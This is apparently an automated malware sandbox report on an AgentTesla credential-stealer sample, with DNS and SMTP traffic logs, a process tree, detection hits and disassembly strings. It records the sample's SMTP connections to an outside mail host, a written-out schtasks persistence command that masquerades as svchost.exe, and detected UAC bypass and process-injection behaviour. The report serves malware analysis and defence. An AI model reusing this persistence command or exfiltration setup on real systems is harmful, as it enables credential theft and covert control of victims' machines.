Jul 25, 2024 21:54:07.879656076 CEST	1.1.1.1	192.168.2.6	0x966	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:54:08.043634892 CEST	1.1.1.1	192.168.2.6	0x9801	No error (0)	cp8nl.hyperhost.ua		185.174.175.187	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:54:09.915829897 CEST	1.1.1.1	192.168.2.6	0x4e1e	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:54:09.915829897 CEST	1.1.1.1	192.168.2.6	0x4e1e	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:55:11.098870993 CEST	1.1.1.1	192.168.2.6	0x329f	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 25, 2024 21:55:11.098870993 CEST	1.1.1.1	192.168.2.6	0x329f	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 25, 2024 21:54:09.508471012 CEST	587	49720	185.174.175.187	192.168.2.6	220-cp8nl.hyperhost.ua ESMTP Exim 4.97.1 #2 Thu, 25 Jul 2024 22:54:08 +0300 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 21:54:09.509284019 CEST	49720	587	192.168.2.6	185.174.175.187	EHLO 528110
Jul 25, 2024 21:54:09.514045954 CEST	587	49720	185.174.175.187	192.168.2.6	220-cp8nl.hyperhost.ua ESMTP Exim 4.97.1 #2 Thu, 25 Jul 2024 22:54:08 +0300 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 21:54:09.514074087 CEST	587	49720	185.174.175.187	192.168.2.6	220-cp8nl.hyperhost.ua ESMTP Exim 4.97.1 #2 Thu, 25 Jul 2024 22:54:08 +0300 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 21:54:09.691643953 CEST	587	49720	185.174.175.187	192.168.2.6	250-cp8nl.hyperhost.ua Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 25, 2024 21:54:09.691885948 CEST	49720	587	192.168.2.6	185.174.175.187	STARTTLS
Jul 25, 2024 21:54:09.870588064 CEST	587	49720	185.174.175.187	192.168.2.6	220 TLS go ahead
Jul 25, 2024 21:54:10.729696035 CEST	587	49722	185.174.175.187	192.168.2.6	220-cp8nl.hyperhost.ua ESMTP Exim 4.97.1 #2 Thu, 25 Jul 2024 22:54:10 +0300 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 21:54:10.729960918 CEST	49722	587	192.168.2.6	185.174.175.187	EHLO 528110
Jul 25, 2024 21:54:10.906634092 CEST	587	49722	185.174.175.187	192.168.2.6	250-cp8nl.hyperhost.ua Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 25, 2024 21:54:10.918380976 CEST	49722	587	192.168.2.6	185.174.175.187	STARTTLS
Jul 25, 2024 21:54:11.096088886 CEST	587	49722	185.174.175.187	192.168.2.6	220 TLS go ahead
Jul 25, 2024 21:54:18.203608990 CEST	587	64305	185.174.175.187	192.168.2.6	220-cp8nl.hyperhost.ua ESMTP Exim 4.97.1 #2 Thu, 25 Jul 2024 22:54:18 +0300 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 21:54:18.203895092 CEST	64305	587	192.168.2.6	185.174.175.187	EHLO 528110
Jul 25, 2024 21:54:18.388670921 CEST	587	64305	185.174.175.187	192.168.2.6	250-cp8nl.hyperhost.ua Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 25, 2024 21:54:18.401778936 CEST	64305	587	192.168.2.6	185.174.175.187	STARTTLS
Jul 25, 2024 21:54:18.586348057 CEST	587	64305	185.174.175.187	192.168.2.6	220 TLS go ahead
Jul 25, 2024 21:54:26.299036980 CEST	587	64307	185.174.175.187	192.168.2.6	220-cp8nl.hyperhost.ua ESMTP Exim 4.97.1 #2 Thu, 25 Jul 2024 22:54:26 +0300 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 21:54:26.299467087 CEST	64307	587	192.168.2.6	185.174.175.187	EHLO 528110
Jul 25, 2024 21:54:26.478414059 CEST	587	64307	185.174.175.187	192.168.2.6	250-cp8nl.hyperhost.ua Hello 528110 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 25, 2024 21:54:26.478773117 CEST	64307	587	192.168.2.6	185.174.175.187	STARTTLS
Jul 25, 2024 21:54:26.658349991 CEST	587	64307	185.174.175.187	192.168.2.6	220 TLS go ahead

Target ID:	1
Start time:	15:53:47
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002A_29.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002A_29.exe"
Imagebase:	0x21d8ebb0000
File size:	684'153 bytes
MD5 hash:	E6A5050DE4674C9280D6FB1A51456867
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.2287115517.0000021D90C2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.2287115517.0000021D9084F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:53:51
Start date:	25/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:53:59
Start date:	25/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Imagebase:	0x7ff655510000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:54:00
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:54:00
Start date:	25/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp990A.tmp.bat""
Imagebase:	0x7ff655510000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:54:00
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:54:00
Start date:	25/07/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Imagebase:	0x7ff782380000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:54:00
Start date:	25/07/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3
Imagebase:	0x7ff6be530000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:54:02
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\svchost.exe
Imagebase:	0x1f232080000
File size:	684'153 bytes
MD5 hash:	E6A5050DE4674C9280D6FB1A51456867
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:54:03
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x21440400000
File size:	684'153 bytes
MD5 hash:	E6A5050DE4674C9280D6FB1A51456867
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2390489517.00000214422A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:54:04
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:
File size:	108'664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	15:54:05
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:	0x7c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2525046983.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2525046983.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2525046983.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2525046983.0000000002B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:54:05
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:	0xca0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:54:05
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Imagebase:	0xd80000
File size:	47'584 bytes
MD5 hash:	94C8E57A80DFCA2482DEDB87B93D4FD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3406933731.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3406933731.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3406933731.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	15:54:05
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Imagebase:	0x3d0000
File size:	47'584 bytes
MD5 hash:	94C8E57A80DFCA2482DEDB87B93D4FD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:54:05
Start date:	25/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	15:54:05
Start date:	25/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 464 -p 1808 -ip 1808
Imagebase:	0x7ff740300000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:54:05
Start date:	25/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 1808 -s 1044
Imagebase:	0x7ff740300000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:54:05
Start date:	25/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 428 -p 3260 -ip 3260
Imagebase:	0x7ff740300000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:54:06
Start date:	25/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3260 -s 1212
Imagebase:	0x7ff740300000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:54:12
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x17040160000
File size:	684'153 bytes
MD5 hash:	E6A5050DE4674C9280D6FB1A51456867
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2462594062.000001704247C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:54:14
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:	0x240000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:54:15
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:	0x5e0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.3409529944.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.3409529944.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.3409529944.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.3409529944.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	15:54:15
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:	0x210000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:54:15
Start date:	25/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 536 -p 7280 -ip 7280
Imagebase:	0x7ff740300000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:54:15
Start date:	25/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7280 -s 1192
Imagebase:	0x7ff740300000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	15:54:20
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x19173820000
File size:	684'153 bytes
MD5 hash:	E6A5050DE4674C9280D6FB1A51456867
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	15:54:22
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Imagebase:
File size:	47'584 bytes
MD5 hash:	94C8E57A80DFCA2482DEDB87B93D4FD9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	15:54:22
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:	0xa10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.3407099977.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.3407099977.0000000002D09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.3407099977.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	15:54:22
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:	0xf70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	15:54:23
Start date:	25/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 572 -p 7572 -ip 7572
Imagebase:	0x7ff740300000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	15:54:23
Start date:	25/07/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7572 -s 1204
Imagebase:	0x7ff740300000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	15:54:34
Start date:	25/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34656D79 Relevance: 14.2, Strings: 11, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

yn4, xrefs: 00007FFD3465710D
HZn4, xrefs: 00007FFD34656E7B
yn4, xrefs: 00007FFD34657011
yn4, xrefs: 00007FFD34656E3B
yn4, xrefs: 00007FFD34657039
8an4, xrefs: 00007FFD346571FB
yn4, xrefs: 00007FFD34657135
yn4, xrefs: 00007FFD34656E13
`'e4, xrefs: 00007FFD34657240
yn4, xrefs: 00007FFD34656F3A
yn4, xrefs: 00007FFD34656F12

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: 8an4$HZn4$`'e4$yn4$yn4$yn4$yn4$yn4$yn4$yn4$yn4
API String ID: 0-747701302
Opcode ID: d884faca61bdba7e764d241157796786b85cc5ac4e07c2f99e1476a4c2a4fb4a
Instruction ID: ded4a95898f5e16951a06d9eea5dbcb4dfe9bbd4b788c9d038dc5d6206d3aba1
Opcode Fuzzy Hash: d884faca61bdba7e764d241157796786b85cc5ac4e07c2f99e1476a4c2a4fb4a
Instruction Fuzzy Hash: E4D12972B189464FEB5CAE2C946A6B473D2EBA5345F1402BED04ECB2E3DD29EC418741

Function 00007FFD3465C998 Relevance: 10.8, Strings: 8, Instructions: 798
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`ks4, xrefs: 00007FFD34669599
psn4, xrefs: 00007FFD3465D0B3
h&r4, xrefs: 00007FFD3465D08F
P$r4, xrefs: 00007FFD3465D01A
x[S4, xrefs: 00007FFD3465CEFB
`ks4, xrefs: 00007FFD346695AF
h&r4, xrefs: 00007FFD3465D0F5
X"r4, xrefs: 00007FFD3465CFA5

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: P$r4$X"r4$`ks4$`ks4$h&r4$h&r4$psn4$x[S4
API String ID: 0-3989044757
Opcode ID: 55e56df3dcfda79717cd201a80178d059a04994ff2a692e8e98ecf5f0e032bfd
Instruction ID: 8ebdb2187b4f916cf2980b58c8ffe526148129f309015c852a5a21cda035cd29
Opcode Fuzzy Hash: 55e56df3dcfda79717cd201a80178d059a04994ff2a692e8e98ecf5f0e032bfd
Instruction Fuzzy Hash: A6322E12B0D6964FE761AB6DA4B55F67BD0EFD1328B0841FBD18DCB183DD1CA84A8780

Function 00007FFD34678870 Relevance: 9.4, Strings: 7, Instructions: 645
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@du4, xrefs: 00007FFD34678C48
`%s4, xrefs: 00007FFD3467AD41
p(r4, xrefs: 00007FFD346789C5
XNu4, xrefs: 00007FFD3467AE99
`%s4, xrefs: 00007FFD3467AC65
`%s4, xrefs: 00007FFD3467AB99
p(r4, xrefs: 00007FFD34678AED

Memory Dump Source

